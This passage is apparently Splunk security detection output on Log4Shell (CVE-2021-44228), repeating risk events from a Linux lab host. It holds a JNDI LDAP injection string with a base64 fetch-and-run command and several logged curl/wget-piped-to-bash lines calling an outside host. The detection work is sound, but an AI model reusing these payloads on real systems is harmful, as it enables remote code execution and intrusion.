In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching capabilities, mainly because the second part of the detection is pretty heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, like http headers for example. If you see results for this detection, it means that there was an injection attempt, which could be reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
